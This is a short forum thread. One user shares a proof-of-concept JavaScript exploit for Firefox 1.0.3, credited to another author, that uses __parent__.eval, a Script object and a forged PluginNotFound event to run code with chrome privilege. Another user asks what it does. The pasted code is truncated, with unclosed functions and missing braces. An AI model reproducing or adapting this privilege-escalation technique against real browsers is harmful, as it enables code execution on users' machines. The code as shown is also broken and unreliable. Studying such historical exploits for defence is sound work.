Programming > Web Languages

Firefox exploit


I found a pretty dangerous firefox mishap, turns out you can get some pretty major command executions exploits from something like this:

<title>Proof-of-Concept for Firefox 1.0.3 - by moz_bug_r_a4</title>
// it needs chrome privilege to get |Components.stack|
var code = "alert('Exploit!\\n\\n' + Components.stack);";
var evalCode = code.replace(/'/g, '"').replace(/\\/g, '\\\\');
var scriptCode = "arguments.callee.__parent__.eval('" + evalCode + "');'';";

var script = (function() {
function x() { new Object(); }
return new Script(scriptCode);

document.body.__defineGetter__("type", function() {
return { toString : script };

var event = document.createEvent("Events");
event.initEvent("PluginNotFound", true, true);

I didn't write it, just thought it was interesting.

can u explan what exactly it dose????


[0] Message Index

Go to full version